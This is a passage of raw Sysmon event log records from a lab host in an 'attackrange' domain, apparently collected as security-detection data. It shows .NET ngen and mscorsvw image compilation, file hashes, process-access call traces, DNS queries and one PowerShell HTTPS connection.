30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023733Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.373{4DB9351A-A287-60D3-DE05-00000000CF01}6736NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\IDCI3QXHP9\System.Net.Http.WebRequest.ni.dll.auxMD5=483431129F9190051B1EC50590DCF257,SHA256=9D4BE4C246AC8E15B56A83439962302B4F3D138D0257301BAFC5422D6C2CF405,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023732Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.373{4DB9351A-A287-60D3-DE05-00000000CF01}6736NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\IDCI3QXHP9\System.Net.Http.WebRequest.ni.dllMD5=7C68A5AC8D535378F612870CA7CCEEDD,SHA256=ED21D278E8040EB0C6C8203D92F08A1D238425A5B2A725F08FD20664C7FDF40A,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023731Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.342{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A287-60D3-DE05-00000000CF01}6736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023730Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.326{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A287-60D3-DE05-00000000CF01}6736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023729Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.326{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A287-60D3-DE05-00000000CF01}6736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023728Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.314{4DB9351A-A287-60D3-DD05-00000000CF01}3744NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\AGQIJ56SHC\System.Net.ni.dll.auxMD5=001D3306D1DB7F0359F91B7ADC4E2E74,SHA256=875C1B5FDA814271F1BB175681834BBD73A0A76D55252601E80E97E433C2A628,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000023727Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.665{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61466-false104.77.62.187a104-77-62-187.deploy.static.akamaitechnologies.com443https 354300x800000000000000023726Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.636{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local56013- 354300x800000000000000023725Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.162{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local56004- 23542300x800000000000000023724Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.314{4DB9351A-A287-60D3-DD05-00000000CF01}3744NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\AGQIJ56SHC\System.Net.ni.dllMD5=8A000F43C92AAB6AD4863B5F14FD43A3,SHA256=2745A4100057838F170AA794BAC37A3C80E6EC1917782472CBF8A2AC6454927E,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023723Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.155{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A287-60D3-DD05-00000000CF01}3744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023722Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.108{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A287-60D3-DD05-00000000CF01}3744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023721Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.108{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A287-60D3-DD05-00000000CF01}3744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023720Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.108{4DB9351A-A287-60D3-DC05-00000000CF01}6372NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6GCYL2DYGC\System.Messaging.ni.dll.auxMD5=881348267BA22AFD6BE8FF784DDE4AD6,SHA256=4E8CBE58E75D814BB43C64ACB16482A879168F493DFB97B6F23912F2BC32AE09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023719Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.092{4DB9351A-A287-60D3-DC05-00000000CF01}6372NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6GCYL2DYGC\System.Messaging.ni.dllMD5=A254DE1138854669ABB33C5B1E80615E,SHA256=95DABDC7C42D37603E1EDB07C127A0E7D28A27F764AAB667FC77269C834DD2F1,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023718Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.076{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A287-60D3-DC05-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023717Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.061{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A287-60D3-DC05-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023716Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.061{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A287-60D3-DC05-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023715Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.045{4DB9351A-A287-60D3-DB05-00000000CF01}2648NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\L52ASFZSAH\System.Management.Instrumentation.ni.dll.auxMD5=C365006CDCF282F093F169FB04BCF9C5,SHA256=91E1017640C1F840770D801DC44DF3361F0CDAB319F484CCC80DA0829853B5A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023714Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.045{4DB9351A-A287-60D3-DB05-00000000CF01}2648NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\L52ASFZSAH\System.Management.Instrumentation.ni.dllMD5=AB09E95598E689D527E3EA9892DF52AF,SHA256=AD948DD22319931AB4C9ED152C8225E1604A632C4A549225087F623F9AEF1045,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023713Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:19.030{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A287-60D3-DB05-00000000CF01}2648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023712Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:18.998{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A287-60D3-DB05-00000000CF01}2648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023711Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:18.998{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A287-60D3-DB05-00000000CF01}2648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023710Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:18.998{4DB9351A-A285-60D3-DA05-00000000CF01}6304NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ZNBGT32ZZE\System.Management.Automation.ni.dll.auxMD5=9EDFB514BCDB548D5483D8605A50DD41,SHA256=905523FA1B622CC8E76919F3EB7AD14E3D8C26CCD18825C71E160920C438FA13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023709Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:18.998{4DB9351A-A285-60D3-DA05-00000000CF01}6304NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ZNBGT32ZZE\System.Management.Automation.ni.dllMD5=D3ACE06BFAE60AFA5674AD4E4B84E2F3,SHA256=79B5DB1CE2EE53CFDB86234CD29438799A9A3E2C56963A7E430FE864A2915366,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023848Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.967{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A288-60D3-F405-00000000CF01}6568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023847Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.967{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A288-60D3-F405-00000000CF01}6568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023846Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.967{4DB9351A-A288-60D3-F305-00000000CF01}4864NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VP8KFPLKHZ\System.ComponentModel.DataAnnotations.ni.dll.auxMD5=D149C73DF08CF42F5F8290A92ABE9315,SHA256=7F58231EC746EF7ACACEAF2E772D9117196308C2D9F6344BC39E5EE07820764E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023845Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.967{4DB9351A-A288-60D3-F305-00000000CF01}4864NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\VP8KFPLKHZ\System.ComponentModel.DataAnnotations.ni.dllMD5=0F83E7236832F4C9A74FDA03467B133F,SHA256=E7616DE770B55F2EE7575AC003BA9ACA9CEF79F0B6444522ED1AD836405EBD06,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023844Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.920{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A288-60D3-F305-00000000CF01}4864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023843Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.905{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A288-60D3-F305-00000000CF01}4864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023842Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:20.905{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A288-60D3-F305-00000000CF01}4864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Fram